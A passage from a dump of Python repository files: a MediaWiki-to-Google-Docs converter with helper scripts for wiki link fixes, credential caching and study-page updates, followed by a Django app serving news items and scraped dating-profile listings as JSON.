subfolders.\n \"\"\"\n relevant_files = {}\n chunked_relevant_folders = \\\n [relevant_folders[i:i + MAX_PARENTS] \\\n for i in range(0, len(relevant_folders), MAX_PARENTS)]\n for folder_list in chunked_relevant_folders:\n query_term = ' in parents or '.join('\"{0}\"'.format(f) for f in folder_list) + ' in parents'\n relevant_files.update(self.get_all_files_in_folders(query_term))\n return relevant_files\n\n\n def get_all_files_in_folders(self, parent_folders):\n \"\"\"\n Return a dictionary of file IDs mapped to file names for the specified parent folders.\n \"\"\"\n 
files_under_folder = {}\n page_token = None\n max_allowed_page_size = 1000\n just_files = f\"mimeType != 'application/vnd.google-apps.folder' and trashed = false and ({parent_folders})\"\n while True:\n results = self.drive.files().list(\n pageSize=max_allowed_page_size,\n fields=\"nextPageToken, files(id, name, mimeType, parents)\",\n includeItemsFromAllDrives=True, supportsAllDrives=True,\n corpora='drive',\n driveId=self.drive_id,\n pageToken=page_token,\n q=just_files).execute()\n files = results.get('files', [])\n page_token = results.get('nextPageToken', None)\n for file in files:\n files_under_folder[file['id']] = file['name']\n if page_token is None:\n break\n return files_under_folder\n\n\n def all_folders_in_drive(self):\n \"\"\"\n Return a dictionary of all the folder IDs in a drive mapped to their \n parent folder IDs (or to the drive itself if a top-level folder).\n This flattens the entire folder structure.\n\n Note that this caches the result, because for our purposes the\n folders will not be changing often enough to matter.\n \"\"\"\n if len(self.folders) > 0:\n return self.folders\n\n page_token = None\n max_allowed_page_size = 1000\n just_folders = \"trashed = false and mimeType = 'application/vnd.google-apps.folder'\"\n while True:\n results = self.drive.files().list(\n pageSize=max_allowed_page_size,\n fields=\"nextPageToken, files(id, name, mimeType, parents)\",\n includeItemsFromAllDrives=True, supportsAllDrives=True,\n corpora='drive',\n driveId=self.drive_id,\n pageToken=page_token,\n q=just_folders).execute()\n result_folders = results.get('files', [])\n page_token = results.get('nextPageToken', None)\n for folder in result_folders:\n self.folders[folder['id']] = folder['parents'][0]\n if page_token is None:\n break\n\n return self.folders\n\n\n def folders_in_folder(self, folder_to_search):\n \"\"\"\n Yield subfolders of the folder-to-search, and then subsubfolders etc.\n Must be called by an iterator.\n \"\"\"\n # Get all subfolders\n temp_list = [k for k, v in self.all_folders_in_drive().items() if v == folder_to_search]\n for sub_folder in temp_list:\n yield sub_folder\n # Recurse\n yield from self.folders_in_folder(sub_folder)\n\n\n def load_common_folders(self):\n self.category_to_folder = {\n 'Study': 'Studies',\n 'Self Report Measure': 'Self Report Library',\n 'Behavioral Task': 'Behavioral Tasks',\n 'Behavioral Task Variant': 'Behavioral Tasks',\n 'Imaging Task': 'Imaging Tasks',\n 'Demo Task': 'Demo Tasks',\n 'Filmable Task': 'Filmable Tasks',\n 'BIOPAC': 'BIOPAC',\n 'Policies and Procedures': 'Policies and Procedures',\n 'CHM Community Meeting': 'Community Meetings',\n 'CHM Human Resources': 'HR',\n 'CHM Research Support Core': 'RSC',\n 'CHM Computing Guides': 'Computing',\n 'Computing': 'Computing',\n 'Kennedy': 'Kennedy',\n 'Keystone': 'Keystone',\n 'Brogden': 'Brogden',\n }\n\n self.namespace_to_folder = {\n 'User': 'People',\n }\n\n self.folders = {}\n for category, name in self.category_to_folder.items():\n self.folders[category] = self.find_folder(name)\n\n for namespace, name in self.namespace_to_folder.items():\n self.folders[namespace] = self.find_folder(name)\n\n\n def convert_one(self, title):\n page = self.wiki.pages[title]\n self.convert(page)\n\n def convert_category(self, category_name):\n category = self.wiki.categories[category_name]\n for page in category:\n self.convert(page)\n\n def convert_all(self, only_if_new=False, older_than=None):\n for page in self.wiki.pages:\n did_stuff = self.convert(page, only_if_new=only_if_new, 
older_than=older_than)\n\n if did_stuff:\n # Hitting some Google api limits, so let's sleep a bit here\n time.sleep(10.0)\n\n def convert_all_new(self):\n self.convert_all(only_if_new=True)\n\n\n def initialize_google_services(self):\n \"\"\"\n Boilerplate to cache a token and connect to the docs and drive services.\n \"\"\"\n\n creds = None\n token_file = 'auth.google_token.json'\n cred_file = 'auth.google_credentials.json'\n\n if os.path.exists(token_file):\n creds = Credentials.from_authorized_user_file(token_file, SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(cred_file, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(token_file, 'w') as token:\n token.write(creds.to_json())\n\n self.docs = build('docs', 'v1', credentials=creds)\n self.drive = build('drive', 'v3', credentials=creds)\n\n\n def find_folder(self, name):\n \"\"\"\n Find folder across all drives by name.\n\n NOTE: Not super reliable if folder names are not unique.\n\n In the future it might be good to take an optional folder id,\n and query the document's folder chain to see if it is inside that\n folder id somewhere.\n \"\"\"\n\n result = self.drive.files().list(q = f\"mimeType = 'application/vnd.google-apps.folder' and name = '{name}'\",\n driveId=self.drive_id, corpora=\"drive\",\n includeItemsFromAllDrives=True,\n supportsAllDrives=True,\n pageSize=10, fields=\"nextPageToken, files(id, name)\").execute()\n folder_id_result = result.get('files', [])\n # If this fails, we couldn't find a folder named `name`\n actual_id = folder_id_result[0].get('id')\n logging.info(f\"Found folder named {name} with {actual_id}\")\n return actual_id\n\n\n def reparent(self, doc_id, folder_id):\n \"\"\"\n Reparent document to a specific folder using the drive API.\n \"\"\"\n\n f = self.drive.files().get(fileId=doc_id,\n fields='parents',\n supportsAllDrives=True).execute()\n previous_parents = \",\".join(f.get('parents'))\n if not folder_id in previous_parents:\n result = self.drive.files().update(\n fileId=doc_id,\n addParents=folder_id,\n removeParents=previous_parents,\n fields='id, parents',\n supportsAllDrives=True,\n ).execute()\n\n\n def add_tag(self, doc_id, tag):\n \"\"\"\n Store tag in document properties if it's not already there\n \"\"\"\n\n if \" \" in tag:\n raise ValueError(f\"Google drive properties can't have spaces, can't add tag '{tag}'\")\n result = self.drive.files().get(fileId=doc_id,\n fields='properties',\n supportsAllDrives=True).execute()\n\n if 'properties' in result:\n props = result['properties']\n else:\n props = {}\n\n tag_with_prefix = f\"tags/{tag}\"\n if not tag_with_prefix in props:\n logging.info(f\"Adding tag {tag} to {doc_id}\")\n # Yes, the weird way gdocwiki stores these as is a prefixed key \n # and a blank value\n props[tag_with_prefix] = ''\n self.drive.files().update(\n fileId=doc_id,\n fields='id, properties',\n body={'properties': props},\n supportsAllDrives=True,\n ).execute()\n\n\n def get_document(self, doc_id):\n return self.docs.documents().get(documentId=doc_id).execute()\n\n def get_document_modified_date(self, doc_id):\n f = self.drive.files().get(fileId=doc_id,\n fields='modifiedTime',\n supportsAllDrives=True).execute()\n return parser.parse(f['modifiedTime'])\n\n\n def batch_update(self, doc_id, requests, debug=False):\n 
\"\"\"\n Batch update the document with the given requests.\n\n If debug is passed, do each request one at a time, slow-ish.\n \"\"\"\n \n if debug:\n for r in requests:\n try:\n self.docs.documents().batchUpdate(\n documentId=doc_id, body={'requests': [r]}).execute()\n except BaseException as e:\n print(f\"Unexpected {e}, {type(e)} with request {r}\")\n raise\n time.sleep(0.1)\n\n else:\n return self.docs.documents().batchUpdate(\n documentId=doc_id, body={'requests': requests}).execute()\n\n\n def traverse(self, f, d, start_index, end_index):\n \"\"\"\n Recursive method to do a common thing we'll be needing a lot:\n store current start_index and end_index, while traversing\n the document tree and calling a function `f` on each dict.\n \"\"\"\n if 'startIndex' in d:\n start_index = d['startIndex']\n\n if 'endIndex' in d:\n end_index = d['endIndex']\n\n f(d, start_index, end_index)\n\n for key, value in d.items():\n if isinstance(value, dict):\n self.traverse(f, value, start_index, end_index)\n elif isinstance(value, list):\n for item in value:\n if isinstance(item, dict):\n self.traverse(f, item, start_index, end_index)\n\n\n def convert(self, page, only_if_new=False, older_than=None, debug=False):\n if page.name in self.mappings.title_to_id:\n if only_if_new:\n return False\n doc_id = self.mappings.title_to_id[page.name]\n if older_than:\n # someday, load up MediaWiki modify date and Google Doc modify date and compare them\n # NOTE: I have no idea what timezone the wiki timestamps actually are \n # wiki_date = datetime.fromtimestamp(time.mktime(page.touched), tzinfo=pytz.timezone('US/Central'))\n # For now, just compare doc_date with the command line\n doc_date = self.get_document_modified_date(doc_id)\n # Parse the command line param and hack in a timezone\n older_date = parser.parse(older_than).replace(tzinfo=pytz.timezone('US/Central'))\n if doc_date > older_date:\n return False\n\n document = self.get_document(doc_id)\n\n logging.info(f\"Converting {page.name} into existing doc {doc_id}\")\n else:\n full_title = page.name\n namespace = None\n if \":\" in full_title:\n namespace, title = full_title.split(\":\", 1)\n else:\n title = full_title\n\n # Create doc fresh\n doc_content = { \n 'title': title,\n }\n document = self.docs.documents().create(body=doc_content).execute()\n doc_id = document['documentId']\n\n self.mappings.add(full_title, doc_id)\n\n # Now we move the file into a folder, based on category\n # Default to the unsorted folder\n folder_id = self.unsorted_folder_id\n\n # But if there is a namespace or mapping to a specific folder, use it\n if namespace:\n for n in self.namespace_to_folder.keys():\n if n == namespace:\n folder_id = self.folders[n]\n break\n else:\n # Note that we just pick the first possible mapping, so order in category_to_folder is important\n page_categories = [c.name.replace('Category:', '') for c in page.categories()]\n for c in self.category_to_folder.keys():\n if c in page_categories:\n folder_id = self.folders[c]\n break\n self.reparent(doc_id, folder_id)\n logging.info(f\"Converting {page.name} into new doc {doc_id} in folder {folder_id}\")\n\n c = GDocConverter(\n self,\n self.wiki,\n self.wiki_prefix,\n self.docs,\n self.mappings,\n self.file_prefix,\n self.http_prefix)\n c.convert(page, doc_id, debug=debug)\n return True\n\n\ndef export_mediawiki(wiki, wiki_prefix, force, older, file_prefix, http_prefix, drive_id, unsorted_folder_id, page_title=None):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n x.run_export(wiki, wiki_prefix, force, older, 
file_prefix, http_prefix, unsorted_folder_id, page_title)\n\n\n\ndef link_folder(wiki, file_prefix, drive_id, files_folder_id, folder_id):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n # Clear out link mappings because we're walkin' em all\n x.mappings.ids_that_link_to_id = {}\n x.run_check_links(wiki, file_prefix, files_folder_id, folder_id)\n x.mappings.save()\n\ndef link_doc(wiki, file_prefix, drive_id, files_folder_id, doc_id):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n # Check just a specific doc\n linker = GDocLinks(wiki, x, file_prefix, files_folder_id)\n linker.check_links(doc_id)\n x.mappings.save()\n"
},
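The Drive calls in gdoc.py above all share one shape: request a page from files().list, collect it, and loop until nextPageToken comes back empty. A minimal runnable sketch of that loop, with a plain function fetch_page standing in for the Drive API call (the name list_all and the fake pages are illustrative, not part of the repo):

def list_all(fetch_page):
    # Skeleton of the nextPageToken loop used throughout GDocDriver above;
    # fetch_page(token) stands in for drive.files().list(...).execute().
    items, token = [], None
    while True:
        result = fetch_page(token)
        items.extend(result.get('files', []))
        token = result.get('nextPageToken')
        if token is None:
            return items

pages = {None: {'files': [1, 2], 'nextPageToken': 't1'}, 't1': {'files': [3]}}
print(list_all(lambda token: pages[token]))  # [1, 2, 3]

Returning once the token is None mirrors the `if page_token is None: break` pattern in the methods above.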
{
"alpha_fraction": 0.6225930452346802,
"alphanum_fraction": 0.6225930452346802,
"avg_line_length": 26.785715103149414,
"blob_id": "f4da0f7c1da6e76000c0be8fda60815eeadb1321",
"content_id": "68d8b2b77291a22cecfbce8609c3526b7648c739",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 28,
"path": "/medialinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport sys\n\ndef fix(page):\n text = page.text()\n p = mwparserfromhell.parse(text)\n has_bad_link = False\n for link in p.filter_wikilinks():\n if \"File:\" in link.title:\n print(\"Fixing link\", link.title, \"in\", page.name)\n has_bad_link = True\n link.title = re.sub(\"^:?File:\", \"Media:\", str(link.title))\n\n if has_bad_link:\n page.save(str(p), \"Automated edit to make File: links into direct Media: links\")\n\ndef run_categories(mother, categories):\n for category in categories:\n for page in mother.categories[category]:\n fix(page)\n\ndef run_pages(mother, pages):\n for title in pages:\n page = mother.pages[title]\n fix(page)\n\n"
},
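The actual rewrite in medialinks.fix is a one-line regex; here is a tiny self-contained check of it on bare strings instead of mwparserfromhell link titles:

import re

# Same substitution medialinks.fix applies to each wikilink title:
# a leading ':File:' or 'File:' becomes 'Media:'; other titles pass through.
for title in ("File:photo.jpg", ":File:photo.jpg", "Media:photo.jpg"):
    print(re.sub(r"^:?File:", "Media:", title))
# -> Media:photo.jpg (three times)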
{
"alpha_fraction": 0.5403472781181335,
"alphanum_fraction": 0.5464760065078735,
"avg_line_length": 24.736841201782227,
"blob_id": "1fb2ce24e8ddcc057f67b376ca02b4289b232d02",
"content_id": "7c36972d28c33c4d746152b7ee2049079371140a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 38,
"path": "/auth_store.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import pickle\nimport getpass\nimport os\nimport os.path\nimport stat\n\n\ndef get_auth():\n fname = 'auth.pickle'\n if os.path.exists(fname):\n auth = pickle.load( open( fname, \"rb\" ) )\n else:\n # Define file params\n flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL # Refer to \"man 2 open\".\n mode = stat.S_IRUSR | stat.S_IWUSR # This is 0o600 in octal\n \n # For security, remove file with potentially elevated mode\n try:\n os.remove(fname)\n except OSError:\n pass\n \n # Open file descriptor\n umask_original = os.umask(0)\n try:\n fdesc = os.open(fname, flags, mode)\n finally:\n os.umask(umask_original)\n \n user = input(\"Username: \")\n password = getpass.getpass()\n auth=(user, password)\n\n # Open file handle and write to file\n with os.fdopen(fdesc, 'wb') as fout:\n pickle.dump(auth, fout)\n\n return auth\n\n"
},
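The dance in auth_store.py (remove the file, zero the umask, os.open with O_EXCL) exists to guarantee the pickle is created with mode 0o600 regardless of the caller's umask. A runnable POSIX sketch of the same pattern against a throwaway path (the file name is illustrative):

import os
import stat
import tempfile

path = os.path.join(tempfile.mkdtemp(), 'secret.bin')
flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL   # fail if the file already exists
mode = stat.S_IRUSR | stat.S_IWUSR             # 0o600: owner read/write only
umask_original = os.umask(0)                   # keep the umask from masking bits off
try:
    fdesc = os.open(path, flags, mode)
finally:
    os.umask(umask_original)
with os.fdopen(fdesc, 'wb') as fout:
    fout.write(b'secret')
print(oct(stat.S_IMODE(os.stat(path).st_mode)))  # 0o600 on POSIX systems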
{
"alpha_fraction": 0.5455012917518616,
"alphanum_fraction": 0.5470436811447144,
"avg_line_length": 45.30952453613281,
"blob_id": "2f70e1530b73cfcf95bd2ffc27866527019bf91a",
"content_id": "b934b9c6a36a7dc419b1e45ec97f4f7ae923c4af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3890,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 84,
"path": "/study.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport requests\nimport dateutil.parser\nimport traceback\nfrom jarvis import Jarvis\nfrom utilities import study_template\n\ndef jsondate_to_str(j):\n return str(dateutil.parser.parse(j).date())\n\ndef run(mother):\n category = mother.categories['Study']\n for page in category:\n oldtext = page.text()\n p = mwparserfromhell.parse(oldtext)\n template = study_template(p)\n if template:\n logging.debug(\"Page {} has template {} with these params: {}\".format(\n page.name, template.name.rstrip(), template.params))\n\n try:\n jarvis_id = template.get(\"JARVIS ID\").value.rstrip()\n except ValueError:\n # Skip JARVIS integration if there's no id\n logging.warning(\"No JARVIS ID on study page %s\" % page.name)\n pass\n else:\n try:\n # Pull stuff out of JARVIS and put it into the template params\n j = Jarvis()\n\n logging.info(\"JARVIS id for %s is %s\" % (page.name, jarvis_id))\n irb_exp = j.irb_expirations(jarvis_id)\n if irb_exp:\n template.add(\"JARVIS IRB Expiration\", irb_exp)\n quota = j.total_active_quota(jarvis_id)\n if quota:\n template.add(\"JARVIS Study Drive Quota\", quota)\n \n # Personnel is a different section of the document, so replace that\n personnel = j.personnel(jarvis_id)\n old_sections = p.get_sections(matches = \"JARVIS Personnel\")\n if len(old_sections) > 0:\n old_personnel = old_sections[0]\n p.replace(old_personnel, personnel)\n\n except Exception as e:\n # Print the error and keep going\n logging.error(f\"Problem fetching from JARVIS on study page {page.name}: {traceback.print_exc()}\")\n pass\n\n try:\n nih_id = template.get(\"NIH RePORTER ID\").value.rstrip()\n except ValueError:\n # We just skip NIH integration if there's no id or we fail in any way\n logging.warning(\"No NIH ID on study page %s\" % page.name)\n pass\n else:\n # award date, NIH start / end dates, break out official NIH title\n logging.info(\"NIH id for %s is %s\" % (page.name, nih_id))\n nih_url = \"https://api.federalreporter.nih.gov/v1/Projects?nihApplId=\" + nih_id\n resp = requests.get(nih_url)\n\n if resp.status_code != 200:\n logging.warning(\"GET {} {}\".format(nih_url, resp.status_code))\n else:\n data = resp.json()\n template.add(\"NIH Title\", data['title'])\n template.add(\"NIH Fiscal Year\", data['fy'])\n template.add(\"NIH Budget Start Date\", jsondate_to_str(data['budgetStartDate']))\n template.add(\"NIH Budget End Date\", jsondate_to_str(data['budgetEndDate']))\n template.add(\"NIH Project Start Date\", jsondate_to_str(data['projectStartDate']))\n template.add(\"NIH Project End Date\", jsondate_to_str(data['projectEndDate']))\n\n newtext = str(p)\n newtext = newtext.replace(\"<noinclude>NOTE: This is prefab content inserted in new study pages</noinclude>\", \"\")\n\n if oldtext.strip() != newtext.strip():\n logging.warning(\"Updating study page %s, change detected\", page.name)\n page.save(newtext, \"Automated edit to update study values from JARVIS and NIH\")\n else:\n logging.info(\"Not updating study page %s, text identical\", page.name)\n"
}
] | 22 |
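gdoc.py above flattens the whole Drive folder hierarchy into a child-to-parent dictionary (all_folders_in_drive) and then walks it with a recursive generator (folders_in_folder). A minimal runnable sketch of that pattern, using a plain dict in place of the Drive API results (the name descendants and the sample tree are illustrative, not part of the repo):

def descendants(folder_to_parent, root):
    # Direct children are the keys whose mapped parent is `root`.
    children = [k for k, v in folder_to_parent.items() if v == root]
    for child in children:
        yield child
        # Recurse into each child's subtree, exactly like folders_in_folder.
        yield from descendants(folder_to_parent, child)

tree = {'a': 'drive', 'b': 'a', 'c': 'a', 'd': 'c'}
assert list(descendants(tree, 'a')) == ['b', 'c', 'd']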
Ghstart/gsite_python_web
|
https://github.com/Ghstart/gsite_python_web
|
b469a7f19f23d85ec9ea48812bf635b08aaf5a2e
|
9da8e5de3f91c8074894b7f3ac1cbac030b9e82c
|
c70d504a7876c7c9ae1b7c294604dc0b48408fc4
|
refs/heads/master
| 2021-01-23T01:51:07.444572 | 2017-06-15T11:07:47 | 2017-06-15T11:07:47 | 94,430,518 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.801075279712677,
"alphanum_fraction": 0.801075279712677,
"avg_line_length": 19.77777862548828,
"blob_id": "6d44875a9fa0122ef9c9de8d2a0669687bd653de",
"content_id": "e13b949a0d4ec1f667bdbedbf952708246c65547",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 9,
"path": "/apps/users/admin.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import UserInfo\n\nclass UserInfoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(UserInfo, UserInfoAdmin)"
},
{
"alpha_fraction": 0.7349397540092468,
"alphanum_fraction": 0.7349397540092468,
"avg_line_length": 15.600000381469727,
"blob_id": "d324b54e8730f55ec8fb1258974e9f1fd25a27e6",
"content_id": "da5e2310702680e39732561850ea7e1ca14d1320",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/apps/gApi/apps.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass GapiConfig(AppConfig):\n name = 'gApi'\n"
},
{
"alpha_fraction": 0.7246695756912231,
"alphanum_fraction": 0.7246695756912231,
"avg_line_length": 37.91428756713867,
"blob_id": "90d923115157b1c1739e5ca5e5615459ecd2c1ea",
"content_id": "745e8fa62f9d99c6832f059cd7c596fecfdf57ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1386,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 35,
"path": "/apps/gApi/admin.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django.utils.html import format_html\n\n# Register your models here.\nfrom .models import News, jobbole_date, jobbole_detail_data, jobbole_image_data\n\nclass NewsAdmin(admin.ModelAdmin):\n pass\n\nclass jobbole_dateAdmin(admin.ModelAdmin):\n list_display = ('custom_description', 'show_detail_info_url', 'publish_time', 'location', 'fav_num')\n\n def show_detail_info_url(self, obj):\n return format_html(\"<a href='{url}' target='_blank'>{url}</a>\", url=obj.detail_info_url)\n show_detail_info_url.short_description = \"详情链接\"\n\nclass jobbole_detail_dataAdmin(admin.ModelAdmin):\n list_display = ('show_detail_description_content',)\n\n def show_detail_description_content(self, obj):\n return format_html(\"<pre>{url}</pre>\", url=obj.detail_description_content)\n show_detail_description_content.short_description = \"自我介绍\"\n\n\nclass jobbole_image_dataAdmin(admin.ModelAdmin):\n list_display = ('show_image_url',)\n\n def show_image_url(self, obj):\n return format_html(\"<a href='{url}' target='_blank'>{url}</a>\", url=obj.image_url)\n show_image_url.short_description = \"自拍链接\"\n\nadmin.site.register(News, NewsAdmin)\nadmin.site.register(jobbole_date, jobbole_dateAdmin)\nadmin.site.register(jobbole_detail_data, jobbole_detail_dataAdmin)\nadmin.site.register(jobbole_image_data, jobbole_image_dataAdmin)\n"
},
{
"alpha_fraction": 0.6142424941062927,
"alphanum_fraction": 0.6180918216705322,
"avg_line_length": 38.543479919433594,
"blob_id": "2be1620d5f0dad6e78e116202981e7ddeb5b03c5",
"content_id": "0b02200b0a5eb31ccf4188639308d89773f7f7d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3653,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 92,
"path": "/apps/gApi/views.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.http import HttpResponse\n\nimport json\nfrom .models import News, jobbole_date, jobbole_image_data, jobbole_detail_data\nfrom gsite import settings\nfrom django.views.generic.base import View\nimport leancloud\nimport logging\n\n# Create your views here.\ndef index(request):\n NewsObject = News.objects.all()\n response_data = {}\n if NewsObject is None:\n response_data['result'] = 'error'\n response_data['success'] = False\n response_data['message'] = 'No datas'\n else:\n collect_datas = []\n for data in NewsObject:\n\n result_data = {}\n result_data['title'] = data.title\n result_data['summary'] = data.summary\n result_data['thumbnail']= settings.IMAGE_ROOT + data.thumbnail.url\n result_data['add_time'] = data.add_time.strftime(\"%Y-%m-%d %H:%M\")\n\n # 发布者的相关信息\n pub_userInfo = {}\n pub_userInfo[\"nick_name\"] = data.userinfo.nick_name\n pub_userInfo[\"avatar\"] = settings.IMAGE_ROOT + data.userinfo.avatar.url\n if pub_userInfo is not None:\n result_data[\"pub_userInfo\"] = pub_userInfo\n\n if result_data is not None:\n collect_datas.append(result_data)\n\n response_data['result'] = collect_datas\n response_data['success'] = True\n response_data['message'] = 'success to get datas'\n\n return HttpResponse(json.dumps(response_data), content_type='application/json')\n\ndef job(request, page):\n # leancloud.init(\"xx\", \"xx\")\n # logging.basicConfig(level=logging.DEBUG)\n # pageIndex = int(page)\n # if pageIndex * 50 > jobbole_date.objects.count() or pageIndex == 1 or pageIndex < 0:\n Jobs = jobbole_date.objects.all()[:50]\n # else:\n # Jobs = jobbole_date.objects.all()[50*(pageIndex - 1):50 * pageIndex]\n # Jobs = jobbole_date.objects.all()\n\n results = {}\n datas = []\n for job in Jobs:\n\n # Jobbole_Date_Object = leancloud.Object.extend('Jobbole_Date_Object')\n # jobbole_object = Jobbole_Date_Object()\n #\n # jobbole_object.set('custom_description', job.custom_description)\n # jobbole_object.set('publish_time', job.publish_time)\n # jobbole_object.set('location', job.location)\n # jobbole_object.set('fav_num', job.fav_num)\n\n temp_dic = {}\n temp_dic['custom_description'] = job.custom_description\n temp_dic['publish_time'] = job.publish_time\n temp_dic['location'] = job.location\n temp_dic['fav_num'] = job.fav_num\n\n detail_info_url_object_id = job.detail_info_url_object_id\n if detail_info_url_object_id:\n images = jobbole_image_data.objects.filter(detail_info_url_object_id=detail_info_url_object_id).values('image_url')\n temp_image_collection = []\n for image_object in images:\n temp_image_collection.append(image_object['image_url'])\n temp_dic['images'] = temp_image_collection\n # jobbole_object.set('images', temp_image_collection)\n\n detail_info = jobbole_detail_data.objects.filter(detail_info_url_object_id=detail_info_url_object_id).values('detail_description_content')\n temp_dic['detail_info'] = detail_info[0]['detail_description_content']\n # jobbole_object.set('detail_info', detail_info[0]['detail_description_content'])\n\n datas.append(temp_dic)\n # jobbole_object.save()\n\n results['list'] = datas\n results['result'] = \"SUCCESS\"\n\n return HttpResponse(json.dumps(results), content_type='application/json')"
},
{
"alpha_fraction": 0.6654819846153259,
"alphanum_fraction": 0.6801421642303467,
"avg_line_length": 36.53333282470703,
"blob_id": "95a42cc6b068615cdce2680eb65f9889aa961071",
"content_id": "33f2336df6534c78c44d8eadf5e409022cad0ef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2427,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 60,
"path": "/apps/gApi/models.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.db import models\nfrom datetime import datetime\n\nfrom users.models import UserInfo\n\n# Create your models here.\nclass News(models.Model):\n userinfo = models.ForeignKey(UserInfo, verbose_name=u\"用户\")\n title = models.CharField(max_length=200, verbose_name=u\"标题\")\n summary = models.TextField(verbose_name=u\"摘要\")\n thumbnail = models.ImageField(upload_to=\"thumbnail/%Y/%m\", verbose_name=u\"缩略图\", max_length=100)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=u\"添加时间\")\n\n class Meta:\n verbose_name = u\"新闻\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.title\n\nclass jobbole_date(models.Model):\n custom_description = models.CharField(max_length=200, verbose_name=u\"自我描述\")\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n publish_time = models.CharField(max_length=45, verbose_name=u\"发布时间\")\n location = models.CharField(max_length=45, verbose_name=u\"发布地址\")\n fav_num = models.IntegerField(default=0, verbose_name=u\"喜欢数\")\n\n class Meta:\n verbose_name = u\"相亲信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.custom_description\n\nclass jobbole_detail_data(models.Model):\n detail_description_content = models.TextField(verbose_name=u\"详细的自我描述\")\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n\n class Meta:\n verbose_name = u\"相亲详细信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.detail_description_content\n\n\nclass jobbole_image_data(models.Model):\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n image_url = models.CharField(max_length=300, verbose_name=u\"妹子发的单张图片\")\n\n class Meta:\n verbose_name = u\"相亲图片信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.detail_info_url"
},
{
"alpha_fraction": 0.4542253613471985,
"alphanum_fraction": 0.49295774102211,
"avg_line_length": 24.909090042114258,
"blob_id": "5a3c04884a5317094b648b21f11fb847ec699d57",
"content_id": "58371373eb67c866851eaeae46cd98f8c4bfd798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 11,
"path": "/apps/gApi/urls.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n__author__ = 'Gh'\n__date__ = '2017/5/25 下午4:39'\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^job/(?P<page>\\d+)$', views.job, name='job'),\n ]"
},
{
"alpha_fraction": 0.5635104179382324,
"alphanum_fraction": 0.6120092272758484,
"avg_line_length": 21.789474487304688,
"blob_id": "62612cc51e94f035c807c0e991ca74f239d208d1",
"content_id": "8fef6c9f2887a2514c41859aa1fdbf263a7819c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/apps/gApi/migrations/0006_remove_jobbole_detail_data_images_url_datas.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
